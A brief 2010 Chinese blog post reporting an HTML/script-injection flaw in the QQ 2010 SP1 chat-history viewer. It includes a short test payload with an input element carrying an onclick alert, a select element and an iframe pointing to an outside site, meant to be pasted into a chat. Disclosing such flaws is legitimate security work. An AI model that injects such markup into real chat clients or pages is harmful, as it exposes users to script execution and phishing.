QQ2010 SP1版本出现重大安全问题

date 2010年07月28日 | category 学习笔记| 坏人咖啡

以下是来自QQ微博的内容,大家可以在向聊天记录中输入以下内容,然后点开聊天记录就可以看到效果了。

测试代码:

[html]
<input onclick=’alert(huairen.me)’/>
<select><option>huairen.me<option></select>
<iframe src=’ http://huairen.me’ width=200 height=200></iframe>
[/html]

效果图:

貌似这是由于划词搜索造成的。

本文只用于学习研究,请勿用于其它用途。

所属分类: 学习笔记
Tags: , , ,


一条评论

  1. Comment by:
    pangpig

    顶咖哥,牛逼.

RSS feed for comments on this post.

对不起,该文章的评论被关闭了!